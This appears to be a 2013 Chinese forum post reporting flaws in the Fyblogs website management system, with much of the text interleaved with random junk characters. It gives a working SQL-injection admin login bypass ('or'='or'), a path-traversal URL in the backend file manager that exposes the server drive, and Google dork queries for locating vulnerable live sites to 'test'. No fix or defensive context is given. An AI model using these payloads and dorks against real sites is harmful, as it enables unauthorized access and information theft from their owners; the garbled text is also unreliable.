漏洞类型: 未授权访问/权限绕过$ U( Q# D7 g1 l* V4 U9 W0 b1 v! |
1 O9 l, R* {: q! H1 w
简要描述:
$ U: b2 M, L& c7 }% k/ `: r' r' w) c2 {7 T4 s! X# |
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!) g( w6 G' U5 a7 W2 |" e2 ?: C# v
4 h" D. Q# J* D* A详细说明:
6 S% K* j$ c: S8 j) d
+ H" l* j2 x2 [8 ~+ a C9 L后台万能密码 'or'='or'( Q4 l- h% i v3 Y: ?" t0 X
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!) e' j+ T& C8 C X: J, P
admin/uploadfile.asp?currentFolder=/upfiles/../
* X' J2 m1 U# W1 j% T8 U$ `4 b% v, o+ O9 d; o6 Z+ [
漏洞证明:- `) h- G( A" f8 s+ [5 d: O3 v
M1 `+ A* b, ^
谷歌:inurl:type.asp?id=1 新闻中心
" {( w7 h# M% r或者 :inurl:download_ok.asp?
7 D! u6 C1 |7 V; Y2 d6 Y
8 D! h1 L/ l9 R9 t可以测试
! ^- X, j9 T+ G/ G( u4 a! N* [# Y# O$ e9 D
2 T; G% n8 }8 y( x, |; ~* b |
发表于 2013-3-7 13:07:46
收藏
支持
反对